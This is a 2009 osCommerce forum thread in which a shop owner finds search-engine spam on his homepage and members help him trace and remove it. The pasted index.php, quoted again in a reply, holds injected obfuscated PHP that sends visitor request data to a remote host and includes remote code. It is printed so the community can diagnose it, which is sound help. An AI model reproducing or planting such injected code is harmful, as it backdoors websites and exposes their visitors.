robertw477 Posted December 30, 2009 Share Posted December 30, 2009 I was poking around some things and found a ton of hidden spam keywords at the bottom of my homepage. They show up in the google cache of my homepage. I have never seen or known about this. Appreciate any help in getting rid of this ASAP. I have no idea how this happened. Any ideas how to prevent this? my website in google cache Thanks Rob Link to comment Share on other sites More sharing options...
Jack_mcs Posted December 30, 2009 Share Posted December 30, 2009 A hacker has changed the index.php file. It is failry common lately and there is at least one thread about it here. You will need to edit that file and remove the code. It is a lot easier if you have a backup of it since you can just replace it. You may want to ask your host to look up when it happened to provide you with the IP (some will, some won't) so that you can block it. Many hackers have multiple IP's so it may not help but it is worth a try. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
robertw477 Posted December 31, 2009 Author Share Posted December 31, 2009 A hacker has changed the index.php file. It is failry common lately and there is at least one thread about it here. You will need to edit that file and remove the code. It is a lot easier if you have a backup of it since you can just replace it. You may want to ask your host to look up when it happened to provide you with the IP (some will, some won't) so that you can block it. Many hackers have multiple IP's so it may not help but it is worth a try. This is my index.php file from root directory. I dont see any weird links here? <?php /* $Id: index.php,v 1.0 2004-02-28 03:24:06+01 bluedog Exp bluedog $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright © 2003 osCommerce Released under the GNU General Public License */ require('includes/application_top.php'); // the following cPath references come from application_top.php $category_depth = 'top'; if (isset($cPath) && tep_not_null($cPath)) { $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'"); $cateqories_products = tep_db_fetch_array($categories_products_query); if ($cateqories_products['total'] > 0) { $category_depth = 'products'; // display products } else { $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'"); $category_parent = tep_db_fetch_array($category_parent_query); if ($category_parent['total'] > 0) { $category_depth = 'nested'; // navigate through the categories } else { $category_depth = 'products'; // category has no products, but display the 'no products' message } } } require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT); ?> <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html <?php echo HTML_PARAMS; ?>> <head> <!-- Begin Search Optimize --> <META NAME="MSSmartTagsPreventParsing" CONTENT="TRUE"> <META NAME="rating" CONTENT="General"> <META NAME="MS.LOCALE" CONTENT="EN-US"> <META NAME="CATEGORY" CONTENT="home page"> <META NAME="robots" CONTENT="index,follow"> <META http-equiv="Classification" CONTENT="wholesale sports products"> <META NAME="URL" CONTENT="http://www.bigapplecard.com/"> <META NAME="revisit-after" CONTENT="31 days"> <META NAME="VW96.objecttype" CONTENT="wholesale sports, wholesale caps, NFL wholesale, NASCAR products,sports memorabilia, NCAA, autographs, autographed, NFL, MLB"> <META NAME="DC.Title" CONTENT="wholesale sports products for retailers"> <META NAME="DC.Subject" CONTENT="wholesale sports, wholesale caps, NFL wholesale, NASCAR products,sports memorabilia, NCAA, autographs, autographed, NFL, MLB"> <META NAME="DC.Coverage.PlaceName" CONTENT="Global"> <!-- wholesale sports, wholesale caps, NFL wholesale, NASCAR products,sports memorabilia, NCAA, autographs, autographed, NFL, MLB --> <!-- End Search Optimize --> <?php // BOF: WebMakers.com Changed: Header Tag Controller v1.0 // Replaced by header_tags.php if ( file_exists(DIR_WS_INCLUDES . 'header_tags.php') ) { require(DIR_WS_INCLUDES . 'header_tags.php'); } else { ?> <title><?php echo TITLE; ?></title> <?php } // EOF: WebMakers.com Changed: Header Tag Controller v1.0 ?> <base href="<?php echo (($request_type == 'SSL') ? HTTPS_SERVER : HTTP_SERVER) . DIR_WS_CATALOG; ?>"> <link rel="stylesheet" type="text/css" href="stylesheet.css"> </head> <body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"> <div align="center"> <!-- header //--> <?php require(DIR_WS_INCLUDES . 'header.php'); ?> <!-- header_eof //--> <!-- body //--> <table border="0" width="960" cellspacing="3" cellpadding="3" bgcolor="#FFFFFF"><tr> <td width="150" valign="top" bgcolor="#FFFFFF"><table border="0" width="150" cellspacing="0" cellpadding="5" bgcolor="#FFFFFF"> <!-- left_navigation //--> <?php require(DIR_WS_INCLUDES . 'column_left.php'); ?> <!-- left_navigation_eof //--> </table></td> <!-- body_text //--> <?php if ($category_depth == 'nested') { $category_query = tep_db_query("select cd.categories_name, cd.categories_heading_title, cd.categories_description, c.categories_image, c.category_head_title_tag, c.category_head_desc_tag, c.category_head_keywords_tag from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.categories_id = '" . $current_category_id . "' and cd.categories_id = '" . $current_category_id . "' and cd.language_id = '" . $languages_id . "'"); $category = tep_db_fetch_array($category_query); ?> <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="5"> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td class="pageHeading"> <?php if ( (ALLOW_CATEGORY_DESCRIPTIONS == 'true') && (tep_not_null($category['category_head_title_tag'])) ) { echo $category['category_head_title_tag']; } else { echo HEADING_TITLE; } ?> </td> <td class="pageHeading" align="right"><?php echo tep_image(DIR_WS_IMAGES . $category['categories_image'], $category['categories_name'], HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td> </tr> <?php if ( (ALLOW_CATEGORY_DESCRIPTIONS == 'true') && (tep_not_null($category['categories_description'])) ) { ?> <tr> <td align="left" colspan="2" class="main"><?php echo $category['categories_description']; ?></td> </tr> <?php } ?> </table></td> </tr> <tr> <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '1'); ?></td> </tr> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <?php if (isset($cPath) && strpos('_', $cPath)) { // check to see if there are deeper categories within the current category $category_links = array_reverse($cPath_array); for($i=0, $n=sizeof($category_links); $i<$n; $i++) { $categories_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$category_links[$i] . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "'"); $categories = tep_db_fetch_array($categories_query); if ($categories['total'] < 1) { // do nothing, go through the loop } else { $categories_query = tep_db_query("select c.categories_id, cd.categories_name, c.categories_image, c.parent_id from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$category_links[$i] . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' order by sort_order, cd.categories_name"); break; // we've found the deepest category the customer is in } } } else { $categories_query = tep_db_query("select c.categories_id, cd.categories_name, c.categories_image, c.parent_id from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.parent_id = '" . (int)$current_category_id . "' and c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' order by sort_order, cd.categories_name"); } $number_of_categories = tep_db_num_rows($categories_query); $rows = 0; while ($categories = tep_db_fetch_array($categories_query)) { $rows++; $cPath_new = tep_get_path($categories['categories_id']); $width = (int)(100 / MAX_DISPLAY_CATEGORIES_PER_ROW) . '%'; echo ' <td align="center" class="smallText" width="' . $width . '" valign="top"><a href="' . tep_href_link(FILENAME_DEFAULT, $cPath_new) . '">' . tep_image(DIR_WS_IMAGES . $categories['categories_image'], $categories['categories_name'], SUBCATEGORY_IMAGE_WIDTH, SUBCATEGORY_IMAGE_HEIGHT) . '<br>' . $categories['categories_name'] . '</a></td>' . "\n"; if ((($rows / MAX_DISPLAY_CATEGORIES_PER_ROW) == floor($rows / MAX_DISPLAY_CATEGORIES_PER_ROW)) && ($rows != $number_of_categories)) { echo ' </tr>' . "\n"; echo ' <tr>' . "\n"; } } // needed for the new products module shown below $new_products_category_id = $current_category_id; ?> </tr> </table></td> </tr> <tr> <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '1'); ?></td> </tr> <tr> <td><?php include(DIR_WS_MODULES . FILENAME_NEW_PRODUCTS); ?></td> </tr> </table></td> </tr> </table></td> <?php } elseif ($category_depth == 'products' || isset($HTTP_GET_VARS['manufacturers_id'])) { // create column list $define_list = array('PRODUCT_LIST_MODEL' => PRODUCT_LIST_MODEL, 'PRODUCT_LIST_NAME' => PRODUCT_LIST_NAME, 'PRODUCT_LIST_MANUFACTURER' => PRODUCT_LIST_MANUFACTURER, 'PRODUCT_LIST_PRICE' => PRODUCT_LIST_PRICE, 'PRODUCT_LIST_QUANTITY' => PRODUCT_LIST_QUANTITY, 'PRODUCT_LIST_WEIGHT' => PRODUCT_LIST_WEIGHT, 'PRODUCT_LIST_IMAGE' => PRODUCT_LIST_IMAGE, 'PRODUCT_LIST_BUY_NOW' => PRODUCT_LIST_BUY_NOW); asort($define_list); $column_list = array(); reset($define_list); while (list($key, $value) = each($define_list)) { if ($value > 0) $column_list[] = $key; } $select_column_list = ''; for ($i=0, $n=sizeof($column_list); $i<$n; $i++) { switch ($column_list[$i]) { case 'PRODUCT_LIST_MODEL': $select_column_list .= 'p.products_model, '; break; case 'PRODUCT_LIST_NAME': $select_column_list .= 'pd.products_name, '; break; case 'PRODUCT_LIST_MANUFACTURER': $select_column_list .= 'm.manufacturers_name, '; break; case 'PRODUCT_LIST_QUANTITY': $select_column_list .= 'p.products_quantity, '; break; case 'PRODUCT_LIST_IMAGE': $select_column_list .= 'p.products_image, '; break; case 'PRODUCT_LIST_WEIGHT': $select_column_list .= 'p.products_weight, '; break; } } $customer_group_query = tep_db_query("select customers_group_id from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . "'"); $customer_group = tep_db_fetch_array($customer_group_query); /*if ($listing_sql['specials_new_products_price'] != "" ){ $listing_sql .= " and s.customers_group_id = '". (int)$customer_group['customers_group_id'] ."'"; } */ // show the products of a specified manufacturer if (isset($HTTP_GET_VARS['manufacturers_id'])) { if (isset($HTTP_GET_VARS['filter_id']) && tep_not_null($HTTP_GET_VARS['filter_id'])) { // We are asked to show only a specific category $listing_sql = "select " . $select_column_list . " p.products_id, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from (" . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c ) left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$HTTP_GET_VARS['filter_id'] . "'"; } else { // We show them all $listing_sql = "select " . $select_column_list . " p.products_id, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from (" . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m) left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and pd.products_id = p.products_id and pd.language_id = '" . (int)$languages_id . "' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'"; } } else { // show the products in a given categorie if (isset($HTTP_GET_VARS['filter_id']) && tep_not_null($HTTP_GET_VARS['filter_id'])) { // We are asked to show only specific catgeory $listing_sql = "select " . $select_column_list . " p.products_id, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from (" . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_MANUFACTURERS . " m, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c) left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '" . (int)$HTTP_GET_VARS['filter_id'] . "' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$current_category_id . "'"; } else { // We show them all $listing_sql = "select " . $select_column_list . " p.products_id, p.manufacturers_id, p.products_price, p.products_tax_class_id, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from ((" . TABLE_PRODUCTS_DESCRIPTION . " pd, " . TABLE_PRODUCTS . " p) left join " . TABLE_MANUFACTURERS . " m on p.manufacturers_id = m.manufacturers_id, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c) left join " . TABLE_SPECIALS . " s on p.products_id = s.products_id where p.products_status = '1' and p.products_id = p2c.products_id and pd.products_id = p2c.products_id and pd.language_id = '" . (int)$languages_id . "' and p2c.categories_id = '" . (int)$current_category_id . "'"; } } if ( (!isset($HTTP_GET_VARS['sort'])) || (!ereg('[1-8][ad]', $HTTP_GET_VARS['sort'])) || (substr($HTTP_GET_VARS['sort'], 0, 1) > sizeof($column_list)) ) { for ($i=0, $n=sizeof($column_list); $i<$n; $i++) { if ($column_list[$i] == 'PRODUCT_LIST_NAME') { $HTTP_GET_VARS['sort'] = $i+1 . 'a'; $listing_sql .= " order by pd.products_name"; break; } } } else { $sort_col = substr($HTTP_GET_VARS['sort'], 0 , 1); $sort_order = substr($HTTP_GET_VARS['sort'], 1); $listing_sql .= ' order by '; switch ($column_list[$sort_col-1]) { case 'PRODUCT_LIST_MODEL': $listing_sql .= "p.products_model " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name"; break; case 'PRODUCT_LIST_NAME': $listing_sql .= "pd.products_name " . ($sort_order == 'd' ? 'desc' : ''); break; case 'PRODUCT_LIST_MANUFACTURER': $listing_sql .= "m.manufacturers_name " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name"; break; case 'PRODUCT_LIST_QUANTITY': $listing_sql .= "p.products_quantity " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name"; break; case 'PRODUCT_LIST_IMAGE': $listing_sql .= "pd.products_name"; break; case 'PRODUCT_LIST_WEIGHT': $listing_sql .= "p.products_weight " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name"; break; case 'PRODUCT_LIST_PRICE': $listing_sql .= "products_price " . ($sort_order == 'd' ? 'desc' : '') . ", pd.products_name"; break; } } // Get the category name and description $category_query = tep_db_query("select cd.categories_name, c.category_head_title_tag, cd.categories_description, c.categories_image from " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where c.categories_id = '" . $current_category_id . "' and cd.categories_id = '" . $current_category_id . "' and cd.language_id = '" . $languages_id . "'"); $category = tep_db_fetch_array($category_query); ?> <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="5"> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td class="pageHeading"> <?php if ( (ALLOW_CATEGORY_DESCRIPTIONS == 'true') && (tep_not_null($category['categories_heading_title_tag '])) ) { echo $category['categories_heading_title_tag ']; } else { echo HEADING_TITLE; } ?> </td> <?php // optional Product List Filter if (PRODUCT_LIST_FILTER > 0) { if (isset($HTTP_GET_VARS['manufacturers_id'])) { $filterlist_sql = "select distinct c.categories_id as id, cd.categories_name as name from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c, " . TABLE_CATEGORIES . " c, " . TABLE_CATEGORIES_DESCRIPTION . " cd where p.products_status = '1' and p.products_id = p2c.products_id and p2c.categories_id = c.categories_id and p2c.categories_id = cd.categories_id and cd.language_id = '" . (int)$languages_id . "' and p.manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "' order by cd.categories_name"; } else { $filterlist_sql= "select distinct m.manufacturers_id as id, m.manufacturers_name as name from " . TABLE_PRODUCTS . " p, " . TABLE_PRODUCTS_TO_CATEGORIES . " p2c, " . TABLE_MANUFACTURERS . " m where p.products_status = '1' and p.manufacturers_id = m.manufacturers_id and p.products_id = p2c.products_id and p2c.categories_id = '" . (int)$current_category_id . "' order by m.manufacturers_name"; } $filterlist_query = tep_db_query($filterlist_sql); if (tep_db_num_rows($filterlist_query) > 1) { echo ' <td align="center" class="main">' . tep_draw_form('filter', FILENAME_DEFAULT, 'get') . TEXT_SHOW . ' '; if (isset($HTTP_GET_VARS['manufacturers_id'])) { echo tep_draw_hidden_field('manufacturers_id', $HTTP_GET_VARS['manufacturers_id']); $options = array(array('id' => '', 'text' => TEXT_ALL_CATEGORIES)); } else { echo tep_draw_hidden_field('cPath', $cPath); $options = array(array('id' => '', 'text' => TEXT_ALL_MANUFACTURERS)); } echo tep_draw_hidden_field('sort', $HTTP_GET_VARS['sort']); while ($filterlist = tep_db_fetch_array($filterlist_query)) { $options[] = array('id' => $filterlist['id'], 'text' => $filterlist['name']); } echo tep_draw_pull_down_menu('filter_id', $options, (isset($HTTP_GET_VARS['filter_id']) ? $HTTP_GET_VARS['filter_id'] : ''), 'onchange="this.form.submit()"'); echo '</form></td>' . "\n"; } } // Get the right image for the top-right $image = DIR_WS_IMAGES . 'table_background_list.gif'; if (isset($HTTP_GET_VARS['manufacturers_id'])) { $image = tep_db_query("select manufacturers_image from " . TABLE_MANUFACTURERS . " where manufacturers_id = '" . (int)$HTTP_GET_VARS['manufacturers_id'] . "'"); $image = tep_db_fetch_array($image); $image = $image['manufacturers_image']; } elseif ($current_category_id) { $image = tep_db_query("select categories_image from " . TABLE_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'"); $image = tep_db_fetch_array($image); $image = $image['categories_image']; } ?> <td align="right"><?php echo tep_image(DIR_WS_IMAGES . $image, HEADING_TITLE, HEADING_IMAGE_WIDTH, HEADING_IMAGE_HEIGHT); ?></td> </tr> <?php if ( (ALLOW_CATEGORY_DESCRIPTIONS == 'true') && (tep_not_null($category['categories_description'])) ) { ?> <tr> <td align="left" colspan="2" class="category_desc"><?php echo $category['categories_description']; ?></td> </tr> <?php } ?> </table></td> </tr> <tr> <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '1'); ?></td> </tr> <tr> <td><?php include(DIR_WS_MODULES . FILENAME_PRODUCT_LISTING); ?></td> </tr> </table></td> <?php } else { // default page ?> <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="5"> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td class="pageHeading"><?php echo HEADING_TITLE; ?></td> </tr> </table></td> </tr> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td class="main"><?php global $customer_id; $customer_group_query = tep_db_query("select customers_group_id from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . "'"); $customer_group = tep_db_fetch_array($customer_group_query); if ( $customer_group['customers_group_id'] == 0) { include(DIR_WS_LANGUAGES . $language . '/' . FILENAME_MAINPAGE_0); // Retail-Not logged in } else { if ( $customer_group['customers_group_id'] == 1) { include(DIR_WS_LANGUAGES . $language . '/' . FILENAME_MAINPAGE_1); // Wholesale logged in } else { if ( $customer_group['customers_group_id'] == 2) { include(DIR_WS_LANGUAGES . $language . '/' . FILENAME_MAINPAGE_2); // Vips logged in } } } ?> <br><br></td> </tr> <tr><td> <?php include(DIR_WS_MODULES . FILENAME_FEATURED_PRODUCTS); ?> </td></tr> <tr> <td><?php echo tep_draw_separator('pixel_trans.gif', '100%', '1'); ?></td> </tr> <?php include(DIR_WS_MODULES . FILENAME_UPCOMING_PRODUCTS); ?> </table></td> </tr> </table></td> <?php } ?> <!-- body_text_eof //--> <td width="150" valign="top" bgcolor="#FFFFFF"><table border="0" width="150" cellspacing="0" cellpadding="5" bgcolor="#FFFFFF"> <!-- right_navigation //--> <?php require(DIR_WS_INCLUDES . 'column_right.php'); ?> <!-- right_navigation_eof //--> </table></td> </tr> </table> <!-- body_eof //--> <!-- footer //--> <?php require(DIR_WS_INCLUDES . 'footer.php'); ?> <!-- footer_eof //--> <br> </div> </body> </html> <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."bdddezzazbzjc".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."bdddezzazbzjc".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?> Link to comment Share on other sites More sharing options...
Jan Zonjee Posted December 31, 2009 Share Posted December 31, 2009 This is my index.php file from root directory. I dont see any weird links here? You must be joking </body> </html> <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."bdddezzazbzjc".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."bdddezzazbzjc".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?> Compare that to a standard index file: </body> </html> <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?> Link to comment Share on other sites More sharing options...
germ Posted December 31, 2009 Share Posted December 31, 2009 Everything after this: require(DIR_WS_INCLUDES . 'application_bottom.php'); Is hackers code. It's encrypted. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
robertw477 Posted December 31, 2009 Author Share Posted December 31, 2009 Everything after this: require(DIR_WS_INCLUDES . 'application_bottom.php'); Is hackers code. It's encrypted. Should I just delete everything shown after application_bottom.php or should I delete that line also. I really have not done much with this site other than some minor tweaks and the overall daily updates. You guys live the program so you know exactly what code should be there. Rob Link to comment Share on other sites More sharing options...
germ Posted December 31, 2009 Share Posted December 31, 2009 Should I just delete everything shown after application_bottom.php or should I delete that line also. I really have not done much with this site other than some minor tweaks and the overall daily updates. You guys live the program so you know exactly what code should be there. Rob Jan has posted what it should look like. I had assumed that you had already removed the code since the links don't show when I access the site. A more likely scenario is that the hackers have coded it to show the spam links only when search engines access the site (they have hard coded IP search engine addresses in their code I believe). Yet another way to hide their efforts. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
germ Posted December 31, 2009 Share Posted December 31, 2009 I decoded it enough to know that the code is accessing this URL: http://bdddezzazbzjc.users.phpinclude.ru At this IP address: 88.151.113.6 In: Paimio, Finland If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
robertw477 Posted December 31, 2009 Author Share Posted December 31, 2009 Jan has posted what it should look like. I had assumed that you had already removed the code since the links don't show when I access the site. A more likely scenario is that the hackers have coded it to show the spam links only when search engines access the site (they have hard coded IP search engine addresses in their code I believe). Yet another way to hide their efforts. I just deleted that excess code. You are correct I think they coded it so the links show only in search engines. I guess I will know only when I check google cache tomm. I think I should also remove the powered by oscommerce on my home page. For the life of me I cant find the correct file for this. Already edited the footer.php in catalog/admin includes and that did not work. You really know your stuff. Maybe I can get my host to block that Ip address from accessing the site. Link to comment Share on other sites More sharing options...
germ Posted December 31, 2009 Share Posted December 31, 2009 I just deleted that excess code. You are correct I think they coded it so the links show only in search engines. I guess I will know only when I check google cache tomm. I think I should also remove the powered by oscommerce on my home page. For the life of me I cant find the correct file for this. Already edited the footer.php in catalog/admin includes and that did not work. You really know your stuff. Maybe I can get my host to block that Ip address from accessing the site. I don't want to rain on your parade, but until you have taken security measures to prevent this and remove all the hack code from all the files in all your folders of your site (still lots of suspicious looking PHP files in the subfolders in your /images folder) I wouldn't be surprised to see the hack code return. :'( If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.